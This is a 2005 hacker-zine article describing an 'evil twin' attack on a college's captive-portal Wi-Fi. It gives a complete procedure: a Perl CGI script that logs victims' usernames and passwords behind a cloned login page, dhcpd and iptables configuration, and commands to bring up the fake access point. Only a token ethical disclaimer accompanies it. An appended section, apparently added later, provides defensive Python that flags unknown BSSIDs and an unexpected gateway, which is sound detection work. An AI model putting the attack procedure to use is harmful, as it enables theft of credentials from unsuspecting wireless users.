(( ACCESS POINT IN THE MIDDLE ))

                                                       ezod '05

.----------------------------------------------------.
| Windsor 2600 Meeting                               |
| First Friday of the Month, CAW Student Centre, 7PM |
'----------------------------------------------------'

(( INTRODUCTION ))

You sit down in some public place, and fire up your laptop with the
wireless network adapter. It picks up a strong signal from a public
access point right in the building. Figuring you'll kill some time by
reading Slashdot, you load your browser and type in the URL, only to
have something that is definitely not Slashdot appear in the window.
It's a web-based login prompt, and your port 80 traffic doesn't get
routed until you fill it in.

Most people without an account would just frown, and click Start, Turn
Off Computer. But you're not most people, and besides, your laptop
isn't running Windows (otherwise you're on your own). You're just going
to have to find something to fill the prompt in with.

(( THE CONCEPT ))

Lest we forget, everything past this point is simply an exercise in
thinking related to a hypothetical situation. Actually applying this
technique could be unethical; consult your conscience for more
information.

[diagram: r33l AP  <-->  j00  <-->  l3g1t1m4t3 lu53r]

What we're going to do here is insert our own temporary access point
that looks like the one we're trying to connect to, and scoop an
account or two from the legitimate users who try to connect to it.
We'll also try to keep said legitimate users (and the sysops of the
real access point) in the dark about the whole thing.

Basically, here's what we need to do:

1. Set up a fake access point that broadcasts the same ESSID as the
   real one.

2. Get a legitimate user to pick up our fake access point instead of
   the real one (we have to position our AP in such a way that it
   provides a stronger signal).

3. Provide a DHCP reply to the legitimate user so he or she is
   networked to our AP's host.

4. Redirect any WWW requests from the legitimate user's machine to a
   web server on our machine, which will conveniently display a page
   that looks just like the real AP's login prompt but works quite
   differently.

5. Dispel any concerns on the part of the legitimate user stemming from
   the lack of web access despite correct authentication.

(( MATERIALS ))

To do this, we will more or less obviously need the aforementioned
laptop with wireless network adapter (which must be capable of
operating in Master mode), a DHCP server, an HTTP server, and some
facility for packet filtering and network address and port translation.
For this example we will use a Gentoo Linux box with a prism54-supported
PCMCIA WLAN card, using dhcpd, Apache and iptables.

(( PROCEDURE ))

First, let's collect some information about the AP we're trying to
fake. The Windsor Clown College wireless system will make a good
example target. Here's what we need to know about that system:

- ESSID: WinClown
- Gateway IP Address: 10.0.0.1
- DHCP Range: 10.0.0.100 - 10.0.0.255

We can grab the authentication page (with its stylesheet and graphics)
from the following URL:

  http://10.0.0.1/auth/index.html

Finally, we can figure out where the actual WinClown access points are
located by reading the College's wireless site
(www.winclown.ca/wireless) and doing a little testing to see how strong
the signals are in various places.

Now let's set up our web server. We'll just copy the authentication
page, making sure it looks the same as the original, but we'll have the
HTML form POST its results to a CGI script like this one (written in
Perl):

  #!/usr/bin/perl
  use strict;
  use warnings;

  my $logfile = "/home/ezod/winclown.log";

  # CGI output: the header must be separated from the body by a blank
  # line, then comes the fake "Logout Successful" page.
  print qq~Content-type: text/html

  Logout Successful
  ~;

  # Read the POSTed form body and append it to the log file.
  read(STDIN, my $buffer, $ENV{'CONTENT_LENGTH'});
  open(LOG, ">>$logfile");
  print LOG $buffer;
  close(LOG);

This script will append the entered username and password to a log file
from which we can retrieve it later. It will also display the "Logout
Successful" screen (which normally appears when a user logs out of the
Aruba system) to at least avoid giving away the existence of our AP. If
we were really paranoid, or not planning on paying attention, we could
have the AP shut down after the first login attempt, but then we run
the risk of getting a bad username and password combination.

Next, let's edit our dhcpd.conf so that (a) our legitimate users can
actually connect to the fake access point, and (b) they get a host
configuration that looks similar to what the real AP would provide.
There should be a subnet entry something like the following:

  subnet 10.0.0.0 netmask 255.255.255.0 {
      range 10.0.0.100 10.0.0.255;
      option domain-name-servers ns1.winclown.ca;
      option domain-name "winclown.ca";
      option routers 10.0.0.2;
      option broadcast-address 10.0.0.255;
      default-lease-time 600;
      max-lease-time 7200;
  }

Now we need to configure the NAT table so that all incoming requests on
port 80 are redirected to the web server on our fake AP:

  # iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT
  # /etc/init.d/iptables save

Everything should be ready to go now. Let's start up the fake access
point and see what happens:

  # iwconfig eth1 mode Master
  # iwconfig eth1 essid WinClown
  # ifconfig eth1 10.0.0.2 netmask 255.255.255.0
  # /etc/init.d/iptables start
  # dhcpd
  # apache2ctl start

If we want to see interactively when a legitimate user tries to
authenticate and we get a username and password, we can tail the
logfile in a terminal.

(( CONCLUSION ))

Pay attention when using a site's wireless network. Whatever security
measures are intended to render this type of attack ineffective, it
ultimately preys on the user's carelessness.

::: mavrinac.com
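The checklist above is written from the attacker's chair. From the other side, a client (or a sysop walking the building) can spot this setup by two symptoms the article itself spells out: the real ESSID appearing from a BSSID the college does not operate (steps 1 and 2), and a DHCP lease whose gateway is 10.0.0.2 instead of the documented 10.0.0.1 (the dhcpd.conf above). The Python below is an added example written for this edit, not code from the article or its author: it parses a constructed iwlist-style scan and a constructed dhclient-style lease and reports both indicators. The BSSID inventory, the sample scan, the sample lease and every function name are assumptions made up for the example.

```python
import re

# Constructed sample in the style of `iwlist eth1 scan` output; not a
# real capture. Cells 01 and 02 stand for the college's real APs, cell
# 03 for a clone of the ESSID on an unknown, much stronger radio.
SAMPLE_SCAN = """\
          Cell 01 - Address: 00:11:22:33:44:55
                    ESSID:"WinClown"
                    Quality=60/100  Signal level=-58 dBm
          Cell 02 - Address: 00:11:22:33:44:56
                    ESSID:"WinClown"
                    Quality=61/100  Signal level=-57 dBm
          Cell 03 - Address: DE:AD:BE:EF:00:01
                    ESSID:"WinClown"
                    Quality=97/100  Signal level=-31 dBm
          Cell 04 - Address: 66:77:88:99:AA:BB
                    ESSID:"CoffeeShop"
                    Quality=40/100  Signal level=-70 dBm
"""

# Constructed dhclient-style lease for the same scenario: the gateway
# offered is 10.0.0.2 rather than the college's documented 10.0.0.1.
SAMPLE_LEASE = """\
lease {
  interface "eth1";
  fixed-address 10.0.0.137;
  option subnet-mask 255.255.255.0;
  option routers 10.0.0.2;
  option domain-name "winclown.ca";
}
"""

# Hypothetical inventory of the BSSIDs the college actually operates;
# a real deployment would keep this from the network's own records.
AUTHORIZED_BSSIDS = {
    "WinClown": {"00:11:22:33:44:55", "00:11:22:33:44:56"},
}
EXPECTED_GATEWAY = "10.0.0.1"

CELL_RE = re.compile(r"Cell \d+ - Address:\s*([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})")
ESSID_RE = re.compile(r'ESSID:"([^"]*)"')
SIGNAL_RE = re.compile(r"Signal level=(-?\d+) dBm")
ROUTERS_RE = re.compile(r"option routers\s+([\d.]+);")


def parse_scan(text):
    """Turn iwlist-style scan text into a list of cell dicts."""
    cells, current = [], None
    for line in text.splitlines():
        m = CELL_RE.search(line)
        if m:
            current = {"bssid": m.group(1).upper(), "essid": None, "signal": None}
            cells.append(current)
            continue
        if current is None:
            continue
        m = ESSID_RE.search(line)
        if m:
            current["essid"] = m.group(1)
        m = SIGNAL_RE.search(line)
        if m:
            current["signal"] = int(m.group(1))
    return cells


def find_evil_twins(scan_text, authorized):
    """Return (essid, bssid, signal) for every cell that advertises a
    known ESSID from a BSSID missing from the inventory, strongest first."""
    suspects = []
    for cell in parse_scan(scan_text):
        known = authorized.get(cell["essid"])
        if known is not None and cell["bssid"] not in known:
            suspects.append((cell["essid"], cell["bssid"], cell["signal"]))
    # A clone has to out-shout the real AP to win clients, so the
    # strongest unknown transmitter is the one to look at first.
    suspects.sort(key=lambda s: s[2] if s[2] is not None else -999, reverse=True)
    return suspects


def check_gateway(lease_text, expected):
    """Compare the router the DHCP server handed out with the documented
    gateway. Returns (matches, offered)."""
    m = ROUTERS_RE.search(lease_text)
    offered = m.group(1) if m else None
    return (offered == expected, offered)


def assess(scan_text, lease_text, authorized=AUTHORIZED_BSSIDS,
           expected_gateway=EXPECTED_GATEWAY):
    """Collect human-readable findings from both checks."""
    findings = []
    for essid, bssid, signal in find_evil_twins(scan_text, authorized):
        findings.append(f"ESSID {essid!r} also advertised by unknown BSSID "
                        f"{bssid} at {signal} dBm")
    ok, offered = check_gateway(lease_text, expected_gateway)
    if not ok:
        findings.append(f"DHCP offered gateway {offered}, expected "
                        f"{expected_gateway}")
    return findings


if __name__ == "__main__":
    for finding in assess(SAMPLE_SCAN, SAMPLE_LEASE):
        print("WARNING:", finding)
```

Run against the constructed samples it reports the clone on DE:AD:BE:EF:00:01 at -31 dBm and the unexpected 10.0.0.2 gateway. Neither check is proof on its own (a site may legitimately add radios, and a lease from a different subnet will naturally name a different router), which is why the inventory of authorized BSSIDs and the expected gateway should come from the network's own documentation rather than from whatever the strongest signal in the room says.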